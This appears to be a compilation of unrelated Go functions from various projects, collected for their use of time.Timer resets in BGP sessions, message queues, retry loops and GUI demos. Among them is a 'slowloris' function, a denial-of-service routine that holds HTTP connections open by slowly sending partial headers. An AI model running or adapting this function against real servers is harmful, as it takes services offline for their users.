func main() { broker := NewBroker() port, err := strconv.Atoi(os.Args[1]) if err != nil { fmt.Println(err.Error()) os.Exit(1) } if len(os.Args) > 2 { registryURL := os.Args[2] myURL := os.Args[3] err := announceBroker(registryURL, myURL) if err != nil { fmt.Println(err.Error()) os.Exit(1) } var timer *time.Timer timer = time.AfterFunc(RegistryAnnouncePeriod, func() { err := announceBroker(registryURL, myURL) if err != nil { fmt.Println("Error reannouncing to broker!") } timer.Reset(RegistryAnnouncePeriod) }) } http.Handle("/", broker) http.ListenAndServe(fmt.Sprintf(":%d", port), nil) }
func (h *FSMHandler) established() bgp.FSMState { fsm := h.fsm h.conn = fsm.conn h.t.Go(h.sendMessageloop) h.msgCh = h.incoming h.t.Go(h.recvMessageloop) var holdTimer *time.Timer if fsm.negotiatedHoldTime == 0 { holdTimer = &time.Timer{} } else { holdTimer = time.NewTimer(time.Second * time.Duration(fsm.negotiatedHoldTime)) } for { select { case <-h.t.Dying(): return 0 case conn, ok := <-fsm.connCh: if !ok { break } conn.Close() log.WithFields(log.Fields{ "Topic": "Peer", "Key": fsm.peerConfig.NeighborAddress, }).Warn("Closed an accepted connection") case <-h.errorCh: h.conn.Close() h.t.Kill(nil) h.reason = "Peer closed the session" return bgp.BGP_FSM_IDLE case <-holdTimer.C: log.WithFields(log.Fields{ "Topic": "Peer", "Key": fsm.peerConfig.NeighborAddress, "data": bgp.BGP_FSM_ESTABLISHED, }).Warn("hold timer expired") m := bgp.NewBGPNotificationMessage(bgp.BGP_ERROR_HOLD_TIMER_EXPIRED, 0, nil) h.outgoing <- m h.reason = "HoldTimer expired" return bgp.BGP_FSM_IDLE case <-h.holdTimerResetCh: if fsm.negotiatedHoldTime != 0 { holdTimer.Reset(time.Second * time.Duration(fsm.negotiatedHoldTime)) } case s := <-fsm.adminStateCh: err := h.changeAdminState(s) if err == nil { switch s { case ADMIN_STATE_DOWN: m := bgp.NewBGPNotificationMessage( bgp.BGP_ERROR_CEASE, bgp.BGP_ERROR_SUB_ADMINISTRATIVE_SHUTDOWN, nil) h.outgoing <- m } } } } return 0 }
// timedDecoder returns a Decorated decoder that generates the given error if no events // are decoded for some number of sequential timeouts. The returned Decoder is not safe // to share across goroutines. // TODO(jdef) this probably isn't the right place for all of this logic (and it's not // just monitoring the heartbeat messages, it's counting all of them..). Heartbeat monitoring // has specific requirements. Get rid of this and implement something better elsewhere. func timedDecoder(dec records.Decoder, dur time.Duration, timeouts int, err error) records.Decoder { var t *time.Timer return records.DecoderFunc(func(v interface{}) error { if t == nil { t = time.NewTimer(dur) } else { t.Reset(dur) } defer t.Stop() errCh := make(chan error, 1) go func() { // there's no way to abort this so someone else will have // to make sure that it dies (and it should if the response // body is closed) errCh <- dec.Decode(v) }() for x := 0; x < timeouts; x++ { select { case <-t.C: // check for a tie select { case e := <-errCh: return e default: // noop, continue } case e := <-errCh: return e } } return err }) }
// execute some action in the context of the current process. Actions // executed via this func are to be executed in a concurrency-safe manner: // no two actions should execute at the same time. invocations of this func // should not block for very long, unless the action backlog is full or the // process is terminating. // returns errProcessTerminated if the process already ended. func (self *procImpl) doLater(deferredAction Action) (err <-chan error) { a := Action(func() { self.wg.Add(1) defer self.wg.Done() deferredAction() }) scheduled := false self.writeLock.Lock() defer self.writeLock.Unlock() var timer *time.Timer for err == nil && !scheduled { switch s := self.state.get(); s { case stateRunning: select { case self.backlog <- a: scheduled = true default: if timer == nil { timer = time.AfterFunc(self.maxRescheduleWait, self.changed.Broadcast) } else { timer.Reset(self.maxRescheduleWait) } self.changed.Wait() timer.Stop() } case stateTerminal: err = ErrorChan(errProcessTerminated) default: err = ErrorChan(errIllegalState) } } return }
func internalPubAsync(clientTimer *time.Timer, msgBody *bytes.Buffer, topic *nsqd.Topic) error { if topic.Exiting() { return nsqd.ErrExiting } info := &nsqd.PubInfo{ Done: make(chan struct{}), MsgBody: msgBody, StartPub: time.Now(), } if clientTimer == nil { clientTimer = time.NewTimer(time.Second * 5) } else { clientTimer.Reset(time.Second * 5) } select { case topic.GetWaitChan() <- info: default: select { case topic.GetWaitChan() <- info: case <-topic.QuitChan(): nsqd.NsqLogger().Infof("topic %v put messages failed at exiting", topic.GetFullName()) return nsqd.ErrExiting case <-clientTimer.C: nsqd.NsqLogger().Infof("topic %v put messages timeout ", topic.GetFullName()) return ErrPubToWaitTimeout } } <-info.Done return info.Err }
func appMain(driver gxui.Driver) { theme := dark.CreateTheme(driver) label := theme.CreateLabel() label.SetText("This is a progress bar:") progressBar := theme.CreateProgressBar() progressBar.SetDesiredSize(math.Size{W: 400, H: 20}) progressBar.SetTarget(100) layout := theme.CreateLinearLayout() layout.AddChild(label) layout.AddChild(progressBar) layout.SetHorizontalAlignment(gxui.AlignCenter) window := theme.CreateWindow(800, 600, "Progress bar") window.SetScale(flags.DefaultScaleFactor) window.AddChild(layout) window.OnClose(driver.Terminate) progress := 0 pause := time.Millisecond * 500 var timer *time.Timer timer = time.AfterFunc(pause, func() { driver.Call(func() { progress = (progress + 3) % progressBar.Target() progressBar.SetProgress(progress) timer.Reset(pause) }) }) }
// timerLoop loops indefinitely to query the given API, until "wait" times // out, using the "tick" timer to delay the API queries. It writes the // result to the given output. func timerLoop(api APIClient, requestedId string, wait, tick *time.Timer) (params.ActionResult, error) { var ( result params.ActionResult err error ) // Loop over results until we get "failed" or "completed". Wait for // timer, and reset it each time. for { result, err = fetchResult(api, requestedId) if err != nil { return result, err } // Whether or not we're waiting for a result, if a completed // result arrives, we're done. switch result.Status { case params.ActionRunning, params.ActionPending: default: return result, nil } // Block until a tick happens, or the timeout arrives. select { case _ = <-wait.C: return result, nil case _ = <-tick.C: tick.Reset(2 * time.Second) } } }
func (s *Scheme) runReader(reader factory.Reader, timer *time.Timer) { if s.warmupMessagesPerRun > 0 { logs.Logger.Info("Reading %d warmup messages", s.warmupMessagesPerRun) } var startTime, lastMessageTime time.Time buffer := make([]byte, s.bytesPerMessage*2) for i := 0; i < s.warmupMessagesPerRun; i++ { reader.Read(buffer) } logs.Logger.Info("Starting reading %d messages...", s.messagesPerRun) for { count, err := reader.Read(buffer) if err == io.EOF { break } lastMessageTime = time.Now() if startTime.IsZero() { startTime = lastMessageTime } timer.Reset(s.waitForLastMessage) s.countMessage(count, err) } logs.Logger.Info("Finished.") s.runTime = lastMessageTime.Sub(startTime) }
func (s *Ssdp) advertiseTimer(ads *AdvertisableServer, d time.Duration, age int) *time.Timer { var timer *time.Timer timer = time.AfterFunc(d, func() { s.advertiseServer(ads, true) timer.Reset(d + time.Duration(age)*time.Second) }) return timer }
func initTimer(t *time.Timer, timeout time.Duration) *time.Timer { if t == nil { return time.NewTimer(timeout) } if t.Reset(timeout) { panic("BUG: active timer trapped into initTimer()") } return t }
func setTimer(timer *time.Timer, d time.Duration) *time.Timer { if timer == nil { return time.NewTimer(d) } timer.Reset(d) return timer }
func main() { start := time.Now() var t *time.Timer t = time.AfterFunc(randomDuration(), func() { fmt.Println(time.Now().Sub(start)) t.Reset(randomDuration()) }) time.Sleep(5 * time.Second) }
func (a *Agent) run(ops <-chan opFunc) { var timer *time.Timer var retry <-chan time.Time retryNeeded := false a.ticker = time.NewTicker(a.Cycle) defer a.ticker.Stop() trySend := func(from time.Time) { if err := a.sendRequest(from); err == nil { retryNeeded = false a.lastPoll = from a.clear() } else if iserr(err, errMustRetry) { if timer == nil { timer = time.NewTimer(time.Minute) retry = timer.C } else { timer.Reset(time.Minute) } retryNeeded = true } else { a.err = err } } for { select { case from := <-retry: trySend(from) case from := <-a.ticker.C: if a.LogMetrics { a.logMetrics() } if !retryNeeded { // Let the retry loop take over until things are back to normal. trySend(from) } case op, ok := <-ops: if !ok { return } else if op == nil { // This should be impossible. If it happens, log it and skip the op. fmt.Fprintln(a.Log, ErrNilOpReceived) continue } if err := op(a); iserr(err, errShuttingDown) { return } else if err != nil { a.err = err } } } }
func Handler(in <-chan nog.Message, out chan<- nog.Message) { out <- nog.Message{What: "started"} s := &Motion{} go func() { out <- nog.Template("motion") }() var motionTimer *time.Timer var motionTimeout <-chan time.Time if c, err := gpio.GPIOInterrupt(7); err == nil { s.motionChannel = c } else { log.Println("Warning: Motion sensor off:", err) out <- nog.Message{What: "no motion sensor found"} goto done } for { select { case m, ok := <-in: if !ok { goto done } if m.Why == "statechanged" { dec := json.NewDecoder(strings.NewReader(m.What)) if err := dec.Decode(s); err != nil { log.Println("motion decode err:", err) } } case motion := <-s.motionChannel: if motion { out <- nog.Message{What: "motion detected"} const duration = 60 * time.Second if motionTimer == nil { s.Motion = true motionTimer = time.NewTimer(duration) motionTimeout = motionTimer.C // enable motionTimeout case } else { motionTimer.Reset(duration) } } case <-motionTimeout: s.Motion = false motionTimer = nil motionTimeout = nil out <- nog.Message{What: "motion detected timeout"} } } done: out <- nog.Message{What: "stopped"} close(out) }
func slowloris(opts options) { var conn net.Conn var err error var timerChan <-chan time.Time var timer *time.Timer if opts.finishAfter > 0 { timer = time.NewTimer(time.Duration(opts.finishAfter) * time.Second) timerChan = timer.C } loop: for { if conn != nil { conn.Close() } conn, err = openConnection(opts) if err != nil { continue } if _, err = fmt.Fprintf(conn, "%s %s HTTP/1.1\r\n", opts.method, opts.resource); err != nil { continue } header := createHeader(opts.target) if err = header.Write(conn); err != nil { continue } for { select { case <-time.After(time.Duration(opts.interval) * time.Second): if timer != nil { timer.Reset(time.Duration(opts.finishAfter) * time.Second) } if _, err := fmt.Fprintf(conn, "%s\r\n", opts.dosHeader); err != nil { continue loop } // if timerChan is nil (finishAfter =< 0) the case involving it will be omitted case <-timerChan: fmt.Fprintf(conn, "\r\n") ioutil.ReadAll(conn) // omit return values conn.Close() continue loop } } } }
func main() { start := time.Now() reset := make(chan bool) var t *time.Timer t = time.AfterFunc(randomDuration(), func() { fmt.Println(time.Now().Sub(start)) reset <- true }) for time.Since(start) < 5*time.Second { <-reset t.Reset(randomDuration()) } }
func main() { flag.Parse() config := buildConfig() logger := log.New(config.LogOutput, "", log.LstdFlags) node, err := onecache.Create(config) if err != nil { logger.Printf("[ERROR] onecache: could not create node: %v\n", err) os.Exit(1) } // Handle interupts. c := make(chan os.Signal, 1) signal.Notify(c, os.Interrupt) node.Start() if *join != "" { peerNodes := strings.Split(*join, ",") if err := node.Join(peerNodes); err != nil { logger.Printf("[ERROR] onecache: could not join peers %v: %v", peerNodes, err) node.Exit() return } } if *retry_join != "" { var retry *time.Timer retryNodes := strings.Split(*retry_join, ",") retry = time.AfterFunc(0, func() { if err := node.Join(retryNodes); err != nil { logger.Printf("[DEBUG] onecache: could not join peers %v: %v\n", retryNodes, err) logger.Printf("[DEBUG] onecache: retrying in %v", *retry_interval) retry.Reset(*retry_interval) } else { retry.Stop() } }) } if *pprofEnabled { go func() { logger.Println(http.ListenAndServe(fmt.Sprintf(":%d", *pprofPort), nil)) }() } // Exit the node upon an interupt. for range c { node.Exit() return } }
// reschedule resets the specified fetch timer to the next announce timeout. func (f *Fetcher) reschedule(fetch *time.Timer) { // Short circuit if no blocks are announced if len(f.announced) == 0 { return } // Otherwise find the earliest expiring announcement earliest := time.Now() for _, announces := range f.announced { if earliest.After(announces[0].time) { earliest = announces[0].time } } fetch.Reset(arriveTimeout - time.Since(earliest)) }
// rescheduleComplete resets the specified completion timer to the next fetch timeout. func (f *Fetcher) rescheduleComplete(complete *time.Timer) { // Short circuit if no headers are fetched if len(f.fetched) == 0 { return } // Otherwise find the earliest expiring announcement earliest := time.Now() for _, announces := range f.fetched { if earliest.After(announces[0].time) { earliest = announces[0].time } } complete.Reset(gatherSlack - time.Since(earliest)) }
func getFlushChan(t *time.Timer, flushDelay time.Duration) <-chan time.Time { if flushDelay <= 0 { return closedFlushChan } if !t.Stop() { // Exhaust expired timer's chan. select { case <-t.C: default: } } t.Reset(flushDelay) return t.C }
// Write attempts to flush the events to the downstream sink until it succeeds // or the sink is closed. func (rs *RetryingSink) Write(event Event) error { logger := logrus.WithField("event", event) var timer *time.Timer retry: select { case <-rs.closed: return ErrSinkClosed default: } if backoff := rs.strategy.Proceed(event); backoff > 0 { if timer == nil { timer = time.NewTimer(backoff) defer timer.Stop() } else { timer.Reset(backoff) } select { case <-timer.C: goto retry case <-rs.closed: return ErrSinkClosed } } if err := rs.sink.Write(event); err != nil { if err == ErrSinkClosed { // terminal! return err } logger := logger.WithError(err) // shadow!! if rs.strategy.Failure(event, err) { logger.Errorf("retryingsink: dropped event") return nil } logger.Errorf("retryingsink: error writing event, retrying") goto retry } rs.strategy.Success(event) return nil }
func updateTimer(t *time.Timer, deadline time.Time) <-chan time.Time { if !t.Stop() { select { case <-t.C: default: } } if deadline.IsZero() { return nil } d := -time.Since(deadline) if d <= 0 { return closedDeadlineCh } t.Reset(d) return t.C }
func (c *connection) reader() { message := make([]byte, 1024) var timer *time.Timer if c.timeout > 0 { timer = time.NewTimer(c.timeout) } for { if c.timeout > 0 { // check if we've timed out select { case <-timer.C: return default: } } nr, err := c.ws.Read(message) if err != nil { break } if nr > 0 { rgb := strings.Split(string(message[:nr]), ",") for i := range color { c, err := strconv.Atoi(rgb[i]) if err != nil { color[i] = 0 } color[i] = byte(c) } if c.timeout > 0 { timer.Reset(c.timeout) } h.broadcast <- fmt.Sprintf("%d,%d,%d", color[0], color[1], color[2]) lightQueue <- color } } c.ws.Close() }
func (w *Proxy) sendEveryInterval(ctx context.Context, interval time.Duration) { defer func() { // Flush on close -- use a different context, though. ctx := context.Background() if timeout := w.timeout; timeout > 0 { var cancel context.CancelFunc ctx, cancel = context.WithTimeout(ctx, timeout) defer cancel() } w.swapAndSend(ctx, nil) }() var tick <-chan time.Time var timer *time.Timer if interval > 0 { timer = time.NewTimer(interval) tick = timer.C defer timer.Stop() } done := ctx.Done() for { select { case <-done: // Dead return case <-tick: // Send after interval (ticker is nil if interval <= 0) w.swapAndSend(ctx, nil) case op := <-w.flush: // Send forced w.swapAndSend(op.ctx, op.err) } // Reset timer if we're using that and not just flushing manually. if timer != nil { timer.Reset(interval) } } }
func debounce(ch chan zk.Event, delay time.Duration) chan zk.Event { debounced := make(chan zk.Event) var t time.Timer var latest zk.Event go func() { latest = <-ch logger.Println("Got event. Delaying post") t = *time.NewTimer(delay) for { select { case ev := <-ch: logger.Println("Got event. Delaying post") latest = ev t.Reset(delay) case _ = <-t.C: logger.Println("No further debouncing. Posting event") debounced <- latest } } }() return debounced }
func (dt *DeferTime) loop() { var ( timer *time.Timer = nil c <-chan time.Time = nil sawTimer = false ) for { select { case <-c: sawTimer = true dt.f() timer, c = nil, nil case <-dt.stopC: if timer != nil && !timer.Stop() && !sawTimer { <-timer.C // drain previous timer since it was not triggered. } timer, c = nil, nil case <-dt.startC: if timer != nil { if !timer.Stop() { <-timer.C } timer.Reset(dt.d) } else { timer = time.NewTimer(dt.d) } c, sawTimer = timer.C, false case <-dt.closeC: if timer != nil && !timer.Stop() && !sawTimer { <-timer.C } return } } }
func (i *idleAwareFramer) monitor() { var ( timer *time.Timer expired <-chan time.Time resetChan = i.resetChan setTimeoutChan = i.setTimeoutChan ) Loop: for { select { case timeout := <-i.setTimeoutChan: i.timeout = timeout if timeout == 0 { if timer != nil { timer.Stop() } } else { if timer == nil { timer = time.NewTimer(timeout) expired = timer.C } else { timer.Reset(timeout) } } case <-resetChan: if timer != nil && i.timeout > 0 { timer.Reset(i.timeout) } case <-expired: i.conn.streamCond.L.Lock() streams := i.conn.streams i.conn.streams = make(map[spdy.StreamId]*Stream) i.conn.streamCond.Broadcast() i.conn.streamCond.L.Unlock() go func() { for _, stream := range streams { stream.resetStream() } i.conn.Close() }() case <-i.conn.closeChan: if timer != nil { timer.Stop() } // Start a goroutine to drain resetChan. This is needed because we've seen // some unit tests with large numbers of goroutines get into a situation // where resetChan fills up, at least 1 call to Write() is still trying to // send to resetChan, the connection gets closed, and this case statement // attempts to grab the write lock that Write() already has, causing a // deadlock. // // See https://github.com/docker/spdystream/issues/49 for more details. go func() { for _ = range resetChan { } }() go func() { for _ = range setTimeoutChan { } }() i.writeLock.Lock() close(resetChan) i.resetChan = nil i.writeLock.Unlock() i.setTimeoutLock.Lock() close(i.setTimeoutChan) i.setTimeoutChan = nil i.setTimeoutLock.Unlock() break Loop } } // Drain resetChan for _ = range resetChan { } }
// Runs in a separate goroutine, accepting incoming messages func (o *S3SplitFileOutput) receiver(or OutputRunner, wg *sync.WaitGroup) { var ( pack *PipelinePack e error timer *time.Timer timerDuration time.Duration outBytes []byte ) ok := true inChan := or.InChan() timerDuration = time.Duration(o.FlushInterval) * time.Millisecond if o.FlushInterval > 0 { timer = time.NewTimer(timerDuration) if o.timerChan == nil { // Tests might have set this already. o.timerChan = timer.C } } // TODO: listen for SIGHUP and finalize all current files. // see file_output.go for an example for ok { select { case pack, ok = <-inChan: if !ok { // Closed inChan => we're shutting down, finalize data files o.finalizeAll() o.shuttingDown = true close(o.publishChan) break } dimPath := o.getDimPath(pack) // fmt.Printf("Found a path: %s\n", dimPath) fileInfo, ok := o.dimFiles[dimPath] if !ok { fileInfo = &SplitFileInfo{ name: filepath.Join(dimPath, o.getNewFilename()), lastUpdate: time.Now().UTC(), size: 0, } o.dimFiles[dimPath] = fileInfo } // Encode the message if outBytes, e = or.Encode(pack); e != nil { atomic.AddInt64(&o.encodeMessageFailures, 1) or.LogError(e) } else if outBytes != nil { // Write to split file doRotate, err := o.writeMessage(fileInfo, outBytes) if err != nil { or.LogError(fmt.Errorf("Error writing message to %s: %s", fileInfo.name, err)) } if doRotate { // Remove current file from the map (which will trigger the // next record with this path to generate a new one) delete(o.dimFiles, dimPath) if e = o.finalizeOne(fileInfo); e != nil { or.LogError(fmt.Errorf("Error finalizing %s: %s", fileInfo.name, e)) } } } // else the encoder did not emit a message. pack.Recycle(nil) case <-o.timerChan: if e = o.rotateFiles(); e != nil { or.LogError(fmt.Errorf("Error rotating files by time: %s", e)) } timer.Reset(timerDuration) } } wg.Done() }
func (h *FSMHandler) established() (bgp.FSMState, FsmStateReason) { fsm := h.fsm h.conn = fsm.conn h.t.Go(h.sendMessageloop) h.msgCh = h.incoming h.t.Go(h.recvMessageloop) var holdTimer *time.Timer if fsm.pConf.Timers.State.NegotiatedHoldTime == 0 { holdTimer = &time.Timer{} } else { holdTimer = time.NewTimer(time.Second * time.Duration(fsm.pConf.Timers.State.NegotiatedHoldTime)) } fsm.gracefulRestartTimer.Stop() for { select { case <-h.t.Dying(): return -1, FSM_DYING case conn, ok := <-fsm.connCh: if !ok { break } conn.Close() log.WithFields(log.Fields{ "Topic": "Peer", "Key": fsm.pConf.Config.NeighborAddress, "State": fsm.state.String(), }).Warn("Closed an accepted connection") case err := <-h.errorCh: h.conn.Close() h.t.Kill(nil) if s := fsm.pConf.GracefulRestart.State; s.Enabled && (err == FSM_READ_FAILED || err == FSM_WRITE_FAILED) { err = FSM_GRACEFUL_RESTART log.WithFields(log.Fields{ "Topic": "Peer", "Key": fsm.pConf.Config.NeighborAddress, "State": fsm.state.String(), }).Info("peer graceful restart") fsm.gracefulRestartTimer.Reset(time.Duration(fsm.pConf.GracefulRestart.State.PeerRestartTime) * time.Second) } return bgp.BGP_FSM_IDLE, err case <-holdTimer.C: log.WithFields(log.Fields{ "Topic": "Peer", "Key": fsm.pConf.Config.NeighborAddress, "State": fsm.state.String(), }).Warn("hold timer expired") m := bgp.NewBGPNotificationMessage(bgp.BGP_ERROR_HOLD_TIMER_EXPIRED, 0, nil) h.outgoing.In() <- &FsmOutgoingMsg{Notification: m} return bgp.BGP_FSM_IDLE, FSM_HOLD_TIMER_EXPIRED case <-h.holdTimerResetCh: if fsm.pConf.Timers.State.NegotiatedHoldTime != 0 { holdTimer.Reset(time.Second * time.Duration(fsm.pConf.Timers.State.NegotiatedHoldTime)) } case s := <-fsm.adminStateCh: err := h.changeAdminState(s) if err == nil { switch s { case ADMIN_STATE_DOWN: m := bgp.NewBGPNotificationMessage(bgp.BGP_ERROR_CEASE, bgp.BGP_ERROR_SUB_ADMINISTRATIVE_SHUTDOWN, nil) h.outgoing.In() <- &FsmOutgoingMsg{Notification: m} } } } } }
func (c *globalClient) sendAnnouncement(timer *time.Timer) { var ann announcement if c.addrList != nil { ann.Direct = c.addrList.ExternalAddresses() } if c.relayStat != nil { for _, relay := range c.relayStat.Relays() { latency, ok := c.relayStat.RelayStatus(relay) if ok { ann.Relays = append(ann.Relays, Relay{ URL: relay, Latency: int32(latency / time.Millisecond), }) } } } if len(ann.Direct)+len(ann.Relays) == 0 { c.setError(errors.New("nothing to announce")) if debug { l.Debugln("Nothing to announce") } timer.Reset(announceErrorRetryInterval) return } // The marshal doesn't fail, I promise. postData, _ := json.Marshal(ann) if debug { l.Debugf("Announcement: %s", postData) } resp, err := c.announceClient.Post(c.server, "application/json", bytes.NewReader(postData)) if err != nil { if debug { l.Debugln("announce POST:", err) } c.setError(err) timer.Reset(announceErrorRetryInterval) return } if debug { l.Debugln("announce POST:", resp.Status) } resp.Body.Close() if resp.StatusCode < 200 || resp.StatusCode > 299 { if debug { l.Debugln("announce POST:", resp.Status) } c.setError(errors.New(resp.Status)) if h := resp.Header.Get("Retry-After"); h != "" { // The server has a recommendation on when we should // retry. Follow it. if secs, err := strconv.Atoi(h); err == nil && secs > 0 { if debug { l.Debugln("announce Retry-After:", secs, err) } timer.Reset(time.Duration(secs) * time.Second) return } } timer.Reset(announceErrorRetryInterval) return } c.setError(nil) if h := resp.Header.Get("Reannounce-After"); h != "" { // The server has a recommendation on when we should // reannounce. Follow it. if secs, err := strconv.Atoi(h); err == nil && secs > 0 { if debug { l.Debugln("announce Reannounce-After:", secs, err) } timer.Reset(time.Duration(secs) * time.Second) return } } timer.Reset(defaultReannounceInterval) }